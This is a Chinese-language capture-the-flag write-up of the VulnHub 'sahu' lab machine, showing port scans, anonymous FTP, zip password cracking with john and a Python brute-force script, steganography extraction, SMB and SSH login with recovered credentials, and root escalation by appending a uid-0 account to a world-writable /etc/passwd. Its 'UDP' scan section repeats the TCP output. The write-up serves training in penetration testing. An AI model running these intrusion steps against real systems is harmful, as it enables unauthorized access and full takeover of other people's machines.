首页 > 其他分享 >vulnhub之sahu

vulnhub之sahu

时间:2023-02-01 00:33:26浏览次数:64  
标签:ftp 62.128 kali 192.168 sahu vulnhub txt open

一、信息获取

1、IP获取

──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 22:47 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.128
Host is up (0.00024s latency).
MAC Address: 00:0C:29:45:11:5D (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00023s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds                                                           

因为我对内网IP比较熟悉,192.168.62.129为kali的IP,192.168.62.128为新增的sahu机器IP。

2、开放端口获取

──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 22:48 HKT
Nmap scan report for 192.168.62.128
Host is up (0.00086s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:45:11:5D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds

扫第二遍

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 22:55 HKT
Nmap scan report for 192.168.62.128
Host is up (0.00090s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:45:11:5D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.35 seconds
                                                              

  两次的结果一样,开放端口为21,22,80,139,445

3、开放端口服务信息获取

  ①tcp端口信息获取

──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p21,22,80,139,445 192.168.62.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 22:48 HKT
Nmap scan report for 192.168.62.128
Host is up (0.00093s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
MAC Address: 00:0C:29:45:11:5D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SAHU-VIRTUALBOX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.68 seconds

②开放端口udp端口信息获取

──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p21,22,80,139,445 192.168.62.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 22:48 HKT
Nmap scan report for 192.168.62.128
Host is up (0.00093s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http         ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
MAC Address: 00:0C:29:45:11:5D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SAHU-VIRTUALBOX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.68 seconds

  可以看到并未开放udp端口。

二、获取SHELL

4、21端口渗透

①尝试ftp匿名登录,用户名anonymous,无密码(到输入密码时回车即可登陆)

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.62.128
Connected to 192.168.62.128.
220 (vsFTPd 3.0.3)
Name (192.168.62.128:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

②获取所有能够获取的文件

ftp> ls
229 Entering Extended Passive Mode (|||38578|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
226 Directory send OK.
ftp> get ftp.zip
local: ftp.zip remote: ftp.zip
229 Entering Extended Passive Mode (|||55212|)
150 Opening BINARY mode data connection for ftp.zip (230 bytes).
100% |**********************************************************************************************************************************************************************|   230        2.29 KiB/s    00:00 ETA
226 Transfer complete.
230 bytes received in 00:00 (2.26 KiB/s)
ftp> exit

 ③ftp.zip破解

  获取到压缩包后发现需要密码才能解压,尝试破解

┌──(kali㉿kali)-[~]
└─$ zip2john ftp.zip >passwd.txt
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 ftp.zip/ftp.txt PKZIP Encr: TS_chk, cmplen=50, decmplen=49, crc=0E919F97 ts=6E8D cs=6e8d type=8
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ john passwd.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
0g 0:00:01:51  3/3 0g/s 16474Kp/s 16474Kc/s 16474KC/s aiecuzz!..acke117j
Session aborted            

  破解了很久都没能成功,因此先放弃,尝试使用其他方法进行渗透。

5、22端口渗透

①搜索是否相应服务版本的漏洞

                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ searchsploit OpenSSH 8.0p1
Exploits: No Results
Shellcodes: No Results                 

  无收获

②尝试爆破(一般不建议)

6、80端口渗透

①查询服务版本是否有漏洞

──(kali㉿kali)-[~]
└─$ searchsploit Apache httpd 2.4.41
Exploits: No Results
Shellcodes: No Results                  

  无收获

②80端口一般提供的是网页服务,因此在浏览器中尝试打开,页面显示一张图片

 

 ③使用kali自带的dirb目录扫描工具对网站进行目录扫描

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.62.128/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jan 29 23:37:27 2023
URL_BASE: http://192.168.62.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.62.128/ ----
==> DIRECTORY: http://192.168.62.128/H/                                                                                                                                                                           
+ http://192.168.62.128/index.php (CODE:200|SIZE:194)                                                                                                                                                             
+ http://192.168.62.128/server-status (CODE:403|SIZE:279)                                                                                                                                                         
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.62.128/H/ ----
==> DIRECTORY: http://192.168.62.128/H/A/                                                                                                                                                                         
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.62.128/H/A/ ----
==> DIRECTORY: http://192.168.62.128/H/A/R/                                                                                                                                                                       
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.62.128/H/A/R/ ----
                                                                                                                                                                                                                  
-----------------
END_TIME: Sun Jan 29 23:37:48 2023
DOWNLOADED: 18448 - FOUND: 2
                                 

  探测出存在http://192.168.62.128/H/A/R/ 目录。

④使用gobuster对网站进行扫描(需要安装,没有自己的目录字典可以使用kali的自带字典文件,路径为/usr/share/wordlists/dirb/和/usr/share/wordlists/dirbuster/)

  全部字典文件都跑一遍探测出了http://192.168.62.128/H/A/R/Y/A/N/A/目录

⑤访问http://192.168.62.128/H/A/R/Y/A/N/A/,显示为

 

 点击查看页面源代码(浏览网页时常做动作),发现源码中有try to extract with hurrry:

 

 尝试使用hurrry为密码解压ftp.zip,失败!

┌──(kali㉿kali)-[~]
└─$ unzip ftp.zip 
Archive:  ftp.zip
[ftp.zip] ftp.txt password: 
password incorrect--reenter:  

在CTF中,常会出现图片隐写的情况,因此提取图片并用steghide工具进行处理。

┌──(kali㉿kali)-[~]
└─$ steghide extract -sf Haryana-1-1.jpg 
Enter passphrase: 
wrote extracted data to "file.txt".
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ls -l
total 116
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Desktop
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Documents
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Downloads
-rw-r--r-- 1 kali kali   125 Jan 30 23:55 file.txt
-rw-r--r-- 1 kali kali   230 Jan 30  2020 ftp.zip
-rw-r--r-- 1 kali kali 71342 Jan 30  2020 Haryana-1-1.jpg
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Music
-rw-r--r-- 1 kali kali   195 Jan 29 23:11 passwd.txt
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Pictures
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Public
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Templates
drwxr-xr-x 2 kali kali  4096 Dec 31 13:30 Videos
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ cat file                  
cat: file: No such file or directory
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ cat file.txt 

      I have found the password for a zip file but i have forgote the last part of it, can you find out
     
       5AHU**                                                                                                                                                                                                                   

发现zip密码六位中的前四位,后两位直接爆破:

在csdn上找了个zip密码爆破脚本修改了一下:(2条消息) python暴力破解zip加密文件_小敢摘葡萄的博客-CSDN博客_python zip 密码

import zipfile
import itertools
 
filename = "ftp.zip"
# 创建一个解压的函数,入参为文件名和密码
# 并使用try-except,避免报错中断程序。
def uncompress(file_name, pass_word):
    try:
        with zipfile.ZipFile(file_name) as z_file:
            z_file.extractall("./", pwd=pass_word.encode("utf-8"))
        return True
    except:
        return False
 
# chars是密码可能的字符集
#chars = "abcdefghijklmnopqrstuvwxyz0123456789"
#for c in itertools.permutations(chars, 4):
#    password = ''.join(c)
#    print(password)
#    result = uncompress(filename, password)
#    if not result:
#        print('解压失败。', password)
#    else:
#        print('解压成功。', password)
#        break
#
for i in range(1,122):
    for j in range(1,122):
        password = '5AHU'+chr(i)+chr(j)
        #print(password)
        result = uncompress(filename,password)
        if result:
            print("success",password)
                                     

运行:

┌──(kali㉿kali)-[~]
└─$ python3 explosion.py
success 5AHU#5

得到密码为5AHU#5

解压ftp.zip文件

┌──(kali㉿kali)-[~]
└─$ unzip ftp.zip
Archive:  ftp.zip
[ftp.zip] ftp.txt password: 
replace ftp.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: ftp.txt                 
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ cat ftp.txt     

      USERNAME = sahu
      PASSWORD = sahu14216                                                                                                                                                                                                                   

⑥得到一个账号和密码,尝试ssh连接

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 

  失败!

7、139,445号端口利用

①139,445同常跑的是共享文件服务,先收集信息

┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.62.128           
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      Samba on Ubuntu
        IPC$            IPC       IPC Service (sahu-VirtualBox server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        SAHU                 SAHU-VIRTUALBOX
                        

  可以看到有sambashare共享目录,尝试登陆

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.62.128/sambashare -A ftp.txt 
Try "help" to get a list of possible commands.
smb: \> 

  登陆成功!

②获取到ssh.txt文件

──(kali㉿kali)-[~]
└─$ smbclient //192.168.62.128/sambashare -A ftp.txt
Try "help" to get a list of possible commands.
smb: \> ?
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \> allinfo
allinfo <file>
smb: \> l
  .                                   D        0  Thu Jan 30 16:50:23 2020
  ..                                  D        0  Thu Jan 30 15:57:06 2020
  ssh.txt                             N       64  Thu Jan 30 16:50:02 2020

                10253588 blocks of size 1024. 3374772 blocks available
smb: \> allinfo ssh.txt 
altname: ssh.txt
create_time:    Thu Jan 30 04:50:03 PM HKT 2020 HKT
access_time:    Thu Jan 30 04:50:07 PM HKT 2020 HKT
write_time:     Thu Jan 30 04:50:03 PM HKT 2020 HKT
change_time:    Thu Jan 30 04:50:03 PM HKT 2020 HKT
attributes:  (80)
stream: [::$DATA], 64 bytes
smb: \> get ssh.txt 
getting file \ssh.txt of size 64 as ssh.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> exit

  根据ssh.txt信息进行登陆操作

──(kali㉿kali)-[~]
└─$ cat ssh.txt 
   ssh users list
   USERNAME = haryana
   PASSWORD = hralltime
                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]                      
[email protected]'s password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-18-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


156 updates can be installed immediately.
77 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Last login: Tue Feb  4 18:05:07 2020 from 192.168.43.111
haryana@sahu-VirtualBox:~$ 

  登陆成功!!

三、提权

8、权限信息收集

①sudo -l

haryana@sahu-VirtualBox:~$ sudo -l
[sudo] password for haryana: 
Sorry, user haryana may not run sudo on sahu-VirtualBox.

②ls -l /etc/crontab

haryana@sahu-VirtualBox:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 1042 Jul 19  2019 /etc/crontab

③ls -l /etc/passwd

haryana@sahu-VirtualBox:~$ ls -l /etc/passwd
-rwxrwxrwx 1 root root 2900 Jan 30  2020 /etc/passwd

  YES!!!有权限对passwd文件进行操作。

9、提权

haryana@sahu-VirtualBox:~$ perl -le 'print crypt("xiaoliyu","addedsalt")'
add31yDYreyBU
haryana@sahu-VirtualBox:~$ echo "xiaoliyu:add31yDYreyBU:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
haryana@sahu-VirtualBox:~$ su - xiaoliyu
Password: 
root@sahu-VirtualBox:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sahu-VirtualBox:~# 

四、结束

root@sahu-VirtualBox:~# cat 
.bash_history  .bashrc        .cache/        .local/        .profile       root.txt       snap/          
root@sahu-VirtualBox:~# cat root.txt 
   GREATE YOU FINISH THIS TASK
                               CONGRATS!!!!!!!!!!!!
     TELL ME ON TWITTER  @VivekGautam09
root@sahu-VirtualBox:~# 

参考:

Vulnhub之Sahu靶机详细测试过程 - Jason_huawen - 博客园 (cnblogs.com)

(2条消息) vulnhub sahu-v1.1_梵歆的博客-CSDN博客_sahu: 1.1

标签:ftp,62.128,kali,192.168,sahu,vulnhub,txt,open
From: https://www.cnblogs.com/xiaoliyulixianji/p/17074157.html

相关文章